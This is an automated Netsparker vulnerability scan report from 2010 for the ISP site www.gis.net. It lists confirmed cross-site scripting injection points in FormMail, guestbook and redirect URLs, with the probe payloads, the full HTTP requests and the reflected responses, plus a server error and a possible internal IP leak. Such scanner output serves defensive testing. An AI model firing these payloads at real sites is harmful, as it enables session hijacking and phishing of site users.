NETSPARKER SCAN REPORT SUMMARY

Netsparker - Scan Report Summary

TARGET URL	http://www.gis.net/
SCAN DATE	9/24/2010 8:54:05 PM
REPORT DATE	9/25/2010 7:17:34 AM
SCAN DURATION	03:45:31.2656250

Total Requests

89461

Average Speed

6.61 req/sec.

identified

confirmed

critical

informational

SCAN SETTINGS

Scan Settings

PROFILE	Previous Settings
ENABLED ENGINES	Static Tests, Find Backup Files, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting

Proxy

Authentication

Scheduled

VULNERABILITIES Vulnerabilities
	MEDIUM 66 % LOW 6 % INFORMATION 28 %

Cross-site Scripting

21 TOTAL

MEDIUM

CONFIRMED

XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Hi-jacking users' active session
Changing the look of the page within the victims browser.
Mounting a successful phishing attack.
Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /cgi-bin/formmail.cgi

/cgi-bin/formmail.cgi CONFIRMED

http://www.gis.net/cgi-bin/formmail.cgi

Parameters

Parameter	Type	Value
_from_address	POST	3
_need	POST	'"--><script>alert(0x000DAE)</script>
_subject	POST	3
_to_address	POST	username@gis.net
Comments	POST	3

Request

POST /cgi-bin/formmail.cgi HTTP/1.1
Referer: http://www.gis.net/cgi.txt
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.gis.net
Content-Length: 131
Accept-Encoding: gzip, deflate

_from_address=3&_need='%22--%3e%3cscript%3enetsparker(0x000DAE)%3c%2fscript%3e&_subject=3&_to_address=username%40gis.net&Comments=3

Response

HTTP/1.1 200 OK
Date: Sat, 25 Sep 2010 01:58:28 GMT
Server: Apache
Transfer-Encoding: chunked
Content-Type: text/html

<html> <head> <title>Error: Blank Fields</title> </head> <center> <table border=0 width=600 bgcolor=#9C9C9C> <tr><th><font size=+2>Error: Blank Fields</font></th></tr> </table> <table border=0 width=600 bgcolor=#CFCFCF> <tr><td>The following fields were left blank in your submission form:<p> <ul> <li>'"--><script>netsparker(0x000DAE)</script> </ul><br> These fields must be filled in before you can successfully submit the form.<p> Please use your browser's back button to return to the form and try again.<hr size=1> <center><font size=-1> <a href="http://www.worldwidemart.com/scripts/formmail.shtml">FormMail</a> V1.6 © 1995 - 1997 Matt Wright<br> A Free Product of <a href="http://www.worldwidemart.com/scripts/">Matt's Script Archive, Inc.</a> </font></center> </td></tr> </table> </center> </body></html>

- /cgi-bin/gbook.cgi/~username/guestbook.html'%22--%3E%3Cscript%3Ealert(0x000E82)%3C/script%3E

/cgi-bin/gbook.cgi/~username/guestbook.html'%22--%3E%3Cscript%3Ealert(0x000E82)%3C/script%3E CONFIRMED

http://www.gis.net/cgi-bin/gbook.cgi/~username/guestbook.html'%22--%3E%3Cscript%3Ealert(0x000E82)%3C..

Parameters

Parameter	Type	Value
address	POST	1
body	POST	1
name	POST	1
URI-BASED	Raw URI	'"--><script>alert(0x000E82)</script>

Request

POST /cgi-bin/gbook.cgi/~username/guestbook.html'%22--%3E%3Cscript%3Enetsparker(0x000E82)%3C/script%3E HTTP/1.1
Referer: http://www.gis.net/cgi.txt
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.gis.net
Content-Length: 24
Accept-Encoding: gzip, deflate

address=1&body=1&name=1&

Response

HTTP/1.1 200 OK
Date: Sat, 25 Sep 2010 02:02:55 GMT
Server: Apache
Transfer-Encoding: chunked
Content-Type: text/html

<HTML><HEAD><TITLE>Post Results</TITLE></HEAD><BODY>Can't open file /usr/local/etc/httpd/htdocs/~username/guestbook.html'"--><script>netsparker(0x000E82)</script>: No such file or directory</BODY></HTML>

- /cgi-bin/formmail.cgi

/cgi-bin/formmail.cgi CONFIRMED

http://www.gis.net/cgi-bin/formmail.cgi

Parameters

Parameter	Type	Value
_to_address	POST	'"--><script>alert(0x000EB5)</script>
_from_address	POST	3
Name	POST	Ronald Smith
_subject	POST	3
_need	POST	Name
Comments	POST	3

Request

POST /cgi-bin/formmail.cgi HTTP/1.1
Referer: http://www.gis.net/cgi.txt
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.gis.net
Content-Length: 135
Accept-Encoding: gzip, deflate

_to_address='%22--%3e%3cscript%3enetsparker(0x000EB5)%3c%2fscript%3e&_from_address=3&Name=Ronald+Smith&_subject=3&_need=Name&Comments=3

Response

HTTP/1.1 200 OK
Date: Sat, 25 Sep 2010 02:04:20 GMT
Server: Apache
Transfer-Encoding: chunked
Content-Type: text/html

<html> <head> <title>Thank You</title> </head> <body> <center> <h1>Thank You For Filling Out This Form</h1></center>Below is what you submitted to '"--><script>netsparker(0x000EB5)</script> on Friday, September 24, 2010 at 22:04:22<p><hr size=1 width=75%><p><b>Name:</b> Ronald Smith<p><b>Comments:</b> 3<p><p><hr size=1 width=75%><p> <hr size=1 width=75%><p> <center><font size=-1><a href="http://www.worldwidemart.com/scripts/formmail.shtml">FormMail</a> V1.6 © 1995 -1997 Matt Wright<br>A Free Product of <a href="http://www.worldwidemart.com/scripts/">Matt's Script Archive, Inc.</a></font></center> </body> </html>Failed to send message to any users

- /cgi-bin/formmail.cgi

/cgi-bin/formmail.cgi CONFIRMED

http://www.gis.net/cgi-bin/formmail.cgi

Parameters

Parameter	Type	Value
_to_address	POST	username@gis.net
_from_address	POST	3
Name	POST	'"--><script>alert(0x000EC1)</script>
_subject	POST	3
_need	POST	Name
Comments	POST	3

Request

POST /cgi-bin/formmail.cgi HTTP/1.1
Referer: http://www.gis.net/cgi.txt
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.gis.net
Content-Length: 141
Accept-Encoding: gzip, deflate

_to_address=username%40gis.net&_from_address=3&Name='%22--%3e%3cscript%3enetsparker(0x000EC1)%3c%2fscript%3e&_subject=3&_need=Name&Comments=3

Response

HTTP/1.1 200 OK
Date: Sat, 25 Sep 2010 02:04:46 GMT
Server: Apache
Transfer-Encoding: chunked
Content-Type: text/html

<html> <head> <title>Thank You</title> </head> <body> <center> <h1>Thank You For Filling Out This Form</h1></center>Below is what you submitted to username@gis.net on Friday, September 24, 2010 at 22:04:47<p><hr size=1 width=75%><p><b>Name:</b> '"--><script>netsparker(0x000EC1)</script><p><b>Comments:</b> 3<p><p><hr size=1 width=75%><p> <hr size=1 width=75%><p> <center><font size=-1><a href="http://www.worldwidemart.com/scripts/formmail.shtml">FormMail</a> V1.6 © 1995 -1997 Matt Wright<br>A Free Product of <a href="http://www.worldwidemart.com/scripts/">Matt's Script Archive, Inc.</a></font></center> </body> </html>Failed to send message to any users

- /cgi-bin/formmail.cgi

/cgi-bin/formmail.cgi CONFIRMED

http://www.gis.net/cgi-bin/formmail.cgi

Parameters

Parameter	Type	Value
_to_address	POST	username@gis.net
_from_address	POST	3
Name	POST	Ronald Smith
_subject	POST	3
_need	POST	'"--><script>alert(0x000ECC)</script>
Comments	POST	3

Request

POST /cgi-bin/formmail.cgi HTTP/1.1
Referer: http://www.gis.net/cgi.txt
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.gis.net
Content-Length: 149
Accept-Encoding: gzip, deflate

_to_address=username%40gis.net&_from_address=3&Name=Ronald+Smith&_subject=3&_need='%22--%3e%3cscript%3enetsparker(0x000ECC)%3c%2fscript%3e&Comments=3

Response

HTTP/1.1 200 OK
Date: Sat, 25 Sep 2010 02:05:10 GMT
Server: Apache
Transfer-Encoding: chunked
Content-Type: text/html

<html> <head> <title>Error: Blank Fields</title> </head> <center> <table border=0 width=600 bgcolor=#9C9C9C> <tr><th><font size=+2>Error: Blank Fields</font></th></tr> </table> <table border=0 width=600 bgcolor=#CFCFCF> <tr><td>The following fields were left blank in your submission form:<p> <ul> <li>'"--><script>netsparker(0x000ECC)</script> </ul><br> These fields must be filled in before you can successfully submit the form.<p> Please use your browser's back button to return to the form and try again.<hr size=1> <center><font size=-1> <a href="http://www.worldwidemart.com/scripts/formmail.shtml">FormMail</a> V1.6 © 1995 - 1997 Matt Wright<br> A Free Product of <a href="http://www.worldwidemart.com/scripts/">Matt's Script Archive, Inc.</a> </font></center> </td></tr> </table> </center> </body></html>

- /cgi-bin/formmail.cgi

/cgi-bin/formmail.cgi CONFIRMED

http://www.gis.net/cgi-bin/formmail.cgi

Parameters

Parameter	Type	Value
_to_address	POST	username@gis.net
_from_address	POST	3
Name	POST	Ronald Smith
_subject	POST	3
_need	POST	Name
Comments	POST	'"--><script>alert(0x000ECD)</script>

Request

POST /cgi-bin/formmail.cgi HTTP/1.1
Referer: http://www.gis.net/cgi.txt
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.gis.net
Content-Length: 152
Accept-Encoding: gzip, deflate

_to_address=username%40gis.net&_from_address=3&Name=Ronald+Smith&_subject=3&_need=Name&Comments='%22--%3e%3cscript%3enetsparker(0x000ECD)%3c%2fscript%3e

Response

HTTP/1.1 200 OK
Date: Sat, 25 Sep 2010 02:05:13 GMT
Server: Apache
Transfer-Encoding: chunked
Content-Type: text/html

<html> <head> <title>Thank You</title> </head> <body> <center> <h1>Thank You For Filling Out This Form</h1></center>Below is what you submitted to username@gis.net on Friday, September 24, 2010 at 22:05:14<p><hr size=1 width=75%><p><b>Name:</b> Ronald Smith<p><b>Comments:</b> '"--><script>netsparker(0x000ECD)</script><p><p><hr size=1 width=75%><p> <hr size=1 width=75%><p> <center><font size=-1><a href="http://www.worldwidemart.com/scripts/formmail.shtml">FormMail</a> V1.6 © 1995 -1997 Matt Wright<br>A Free Product of <a href="http://www.worldwidemart.com/scripts/">Matt's Script Archive, Inc.</a></font></center> </body> </html>Failed to send message to any users

- /boston

/boston

http://www.gis.net/boston?/"ns="alert(0x00026E)

Parameters

Parameter	Type	Value
Query Based	QUERYSTRING	/"ns="alert(0x00026E)

Request

GET /boston?/"ns="netsparker(0x00026E) HTTP/1.1
Referer: http://www.gis.net/wifi.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 25 Sep 2010 01:28:43 GMT
Server: Apache
Location: http://www.gis.net/boston/?/"ns="netsparker(0x00026E)
Content-Length: 261
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.gis.net/boston/?/"ns="netsparker(0x00026E)">here</a>.</p></body></html>

- /support/windows/xp

/support/windows/xp

http://www.gis.net/support/windows/xp?/"ns="alert(0x0002EC)

Parameters

Parameter	Type	Value
Query Based	QUERYSTRING	/"ns="alert(0x0002EC)

Request

GET /support/windows/xp?/"ns="netsparker(0x0002EC) HTTP/1.1
Referer: http://www.gis.net/support/dialup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 25 Sep 2010 01:28:51 GMT
Server: Apache
Location: http://www.gis.net/support/windows/xp/?/"ns="netsparker(0x0002EC)
Content-Length: 273
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.gis.net/support/windows/xp/?/"ns="netsparker(0x0002EC)">here</a>.</p></body></html>

- /support/windows/win2000

/support/windows/win2000

http://www.gis.net/support/windows/win2000?/"ns="alert(0x000300)

Parameters

Parameter	Type	Value
Query Based	QUERYSTRING	/"ns="alert(0x000300)

Request

GET /support/windows/win2000?/"ns="netsparker(0x000300) HTTP/1.1
Referer: http://www.gis.net/support/dialup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 25 Sep 2010 01:28:52 GMT
Server: Apache
Location: http://www.gis.net/support/windows/win2000/?/"ns="netsparker(0x000300)
Content-Length: 278
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.gis.net/support/windows/win2000/?/"ns="netsparker(0x000300)">here</a>.</p></body></html>

- /support/windows/winme

/support/windows/winme

http://www.gis.net/support/windows/winme?/"ns="alert(0x00030E)

Parameters

Parameter	Type	Value
Query Based	QUERYSTRING	/"ns="alert(0x00030E)

Request

GET /support/windows/winme?/"ns="netsparker(0x00030E) HTTP/1.1
Referer: http://www.gis.net/support/dialup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 25 Sep 2010 01:28:52 GMT
Server: Apache
Location: http://www.gis.net/support/windows/winme/?/"ns="netsparker(0x00030E)
Content-Length: 276
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.gis.net/support/windows/winme/?/"ns="netsparker(0x00030E)">here</a>.</p></body></html>

- /support/windows/winnt

/support/windows/winnt

http://www.gis.net/support/windows/winnt?/"ns="alert(0x000327)

Parameters

Parameter	Type	Value
Query Based	QUERYSTRING	/"ns="alert(0x000327)

Request

GET /support/windows/winnt?/"ns="netsparker(0x000327) HTTP/1.1
Referer: http://www.gis.net/support/dialup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 25 Sep 2010 01:28:53 GMT
Server: Apache
Location: http://www.gis.net/support/windows/winnt/?/"ns="netsparker(0x000327)
Content-Length: 276
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.gis.net/support/windows/winnt/?/"ns="netsparker(0x000327)">here</a>.</p></body></html>

- /support/windows/win98

/support/windows/win98

http://www.gis.net/support/windows/win98?/"ns="alert(0x000320)

Parameters

Parameter	Type	Value
Query Based	QUERYSTRING	/"ns="alert(0x000320)

Request

GET /support/windows/win98?/"ns="netsparker(0x000320) HTTP/1.1
Referer: http://www.gis.net/support/dialup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 25 Sep 2010 01:28:53 GMT
Server: Apache
Location: http://www.gis.net/support/windows/win98/?/"ns="netsparker(0x000320)
Content-Length: 276
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.gis.net/support/windows/win98/?/"ns="netsparker(0x000320)">here</a>.</p></body></html>

- /support/mac/osx

/support/mac/osx

http://www.gis.net/support/mac/osx?/"ns="alert(0x000336)

Parameters

Parameter	Type	Value
Query Based	QUERYSTRING	/"ns="alert(0x000336)

Request

GET /support/mac/osx?/"ns="netsparker(0x000336) HTTP/1.1
Referer: http://www.gis.net/support/dialup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 25 Sep 2010 01:28:54 GMT
Server: Apache
Location: http://www.gis.net/support/mac/osx/?/"ns="netsparker(0x000336)
Content-Length: 270
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.gis.net/support/mac/osx/?/"ns="netsparker(0x000336)">here</a>.</p></body></html>

- /support/mac/imac

/support/mac/imac

http://www.gis.net/support/mac/imac?/"ns="alert(0x000354)

Parameters

Parameter	Type	Value
Query Based	QUERYSTRING	/"ns="alert(0x000354)

Request

GET /support/mac/imac?/"ns="netsparker(0x000354) HTTP/1.1
Referer: http://www.gis.net/support/dialup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 25 Sep 2010 01:28:56 GMT
Server: Apache
Location: http://www.gis.net/support/mac/imac/?/"ns="netsparker(0x000354)
Content-Length: 271
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.gis.net/support/mac/imac/?/"ns="netsparker(0x000354)">here</a>.</p></body></html>

- /support/dsl/win2k

/support/dsl/win2k

http://www.gis.net/support/dsl/win2k?/"ns="alert(0x0003ED)

Parameters

Parameter	Type	Value
Query Based	QUERYSTRING	/"ns="alert(0x0003ED)

Request

GET /support/dsl/win2k?/"ns="netsparker(0x0003ED) HTTP/1.1
Referer: http://www.gis.net/support/dsl.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 25 Sep 2010 01:29:03 GMT
Server: Apache
Location: http://www.gis.net/support/dsl/win2k/?/"ns="netsparker(0x0003ED)
Content-Length: 272
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.gis.net/support/dsl/win2k/?/"ns="netsparker(0x0003ED)">here</a>.</p></body></html>

- /support/dsl/win98

/support/dsl/win98

http://www.gis.net/support/dsl/win98?/"ns="alert(0x0003F4)

Parameters

Parameter	Type	Value
Query Based	QUERYSTRING	/"ns="alert(0x0003F4)

Request

GET /support/dsl/win98?/"ns="netsparker(0x0003F4) HTTP/1.1
Referer: http://www.gis.net/support/dsl.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 25 Sep 2010 01:29:04 GMT
Server: Apache
Location: http://www.gis.net/support/dsl/win98/?/"ns="netsparker(0x0003F4)
Content-Length: 272
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.gis.net/support/dsl/win98/?/"ns="netsparker(0x0003F4)">here</a>.</p></body></html>

- /support/dsl/nt

/support/dsl/nt

http://www.gis.net/support/dsl/nt?/"ns="alert(0x000401)

Parameters

Parameter	Type	Value
Query Based	QUERYSTRING	/"ns="alert(0x000401)

Request

GET /support/dsl/nt?/"ns="netsparker(0x000401) HTTP/1.1
Referer: http://www.gis.net/support/dsl.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 25 Sep 2010 01:29:39 GMT
Server: Apache
Location: http://www.gis.net/support/dsl/nt/?/"ns="netsparker(0x000401)
Content-Length: 269
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.gis.net/support/dsl/nt/?/"ns="netsparker(0x000401)">here</a>.</p></body></html>

- /support/dsl/mac

/support/dsl/mac

http://www.gis.net/support/dsl/mac?/"ns="alert(0x00041D)

Parameters

Parameter	Type	Value
Query Based	QUERYSTRING	/"ns="alert(0x00041D)

Request

GET /support/dsl/mac?/"ns="netsparker(0x00041D) HTTP/1.1
Referer: http://www.gis.net/support/dsl.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 25 Sep 2010 01:29:42 GMT
Server: Apache
Location: http://www.gis.net/support/dsl/mac/?/"ns="netsparker(0x00041D)
Content-Length: 270
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.gis.net/support/dsl/mac/?/"ns="netsparker(0x00041D)">here</a>.</p></body></html>

- /signup

/signup

http://www.gis.net/signup?/"ns="alert(0x0004BE)

Parameters

Parameter	Type	Value
Query Based	QUERYSTRING	/"ns="alert(0x0004BE)

Request

GET /signup?/"ns="netsparker(0x0004BE) HTTP/1.1
Referer: http://www.gis.net/dialup/ga.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 25 Sep 2010 01:29:47 GMT
Server: Apache
Location: http://www.gis.net/signup/?/"ns="netsparker(0x0004BE)
Content-Length: 261
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.gis.net/signup/?/"ns="netsparker(0x0004BE)">here</a>.</p></body></html>

- /softphone

/softphone

http://www.gis.net/softphone?/"ns="alert(0x000439)

Parameters

Parameter	Type	Value
Query Based	QUERYSTRING	/"ns="alert(0x000439)

Request

GET /softphone?/"ns="netsparker(0x000439) HTTP/1.1
Referer: http://www.gis.net/support/phone.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 25 Sep 2010 01:29:43 GMT
Server: Apache
Location: http://www.gis.net/softphone/?/"ns="netsparker(0x000439)
Content-Length: 264
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.gis.net/softphone/?/"ns="netsparker(0x000439)">here</a>.</p></body></html>

- /register

/register

http://www.gis.net/register?/"ns="alert(0x00048C)

Parameters

Parameter	Type	Value
Query Based	QUERYSTRING	/"ns="alert(0x00048C)

Request

GET /register?/"ns="netsparker(0x00048C) HTTP/1.1
Referer: http://www.gis.net/support/webhosting.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 25 Sep 2010 01:29:45 GMT
Server: Apache
Location: http://www.gis.net/register/?/"ns="netsparker(0x00048C)
Content-Length: 263
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.gis.net/register/?/"ns="netsparker(0x00048C)">here</a>.</p></body></html>

Internal Server Error

1 TOTAL

LOW

CONFIRMED

The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.

Impact

The impact may vary depending on the condition. This might be an indication of a bigger issue such as SQL Injection or could be the result or poor coding practices.

Remedy

Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.

- /~sotis/cgi-bin/crazywwwboard.cgi

/~sotis/cgi-bin/crazywwwboard.cgi CONFIRMED

http://www.gis.net/~sotis/cgi-bin/crazywwwboard.cgi

Request

GET /~sotis/cgi-bin/crazywwwboard.cgi HTTP/1.1
Referer: http://www.gis.net/~sotis/cgi-bin/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Date: Sat, 25 Sep 2010 00:54:58 GMT
Server: Apache
Content-Length: 532
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator, root@gis.net and inform them of the time the error occurred,and anything you might have done that may havecaused the error.</p><p>More information about this error may be availablein the server error log.</p></body></html>

[Possible] Internal IP Address Leakage

1 TOTAL

LOW

Netsparker discovered an internal IP address in the page. It was not determined if the IP address was that of the system itself or that of an internal network.

Impact

This kind of information can be useful for an attacker when combined with other vulnerabilities.

Remedy

First ensure that this is not a false positive. Due to the nature of the issue. Netsparker could not confirm that this IP address was actually the real internal IP address of the target web server or internal network. If it is then consider removing it.

- /support/dsl/win2k/

/support/dsl/win2k/

http://www.gis.net/support/dsl/win2k/

Extracted IP Address(es)

192.168.100.2
192.168.100.1

Request

GET /support/dsl/win2k/ HTTP/1.1
Referer: http://www.gis.net/support/dsl/win2k
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 25 Sep 2010 00:54:41 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 4203
Content-Type: text/html

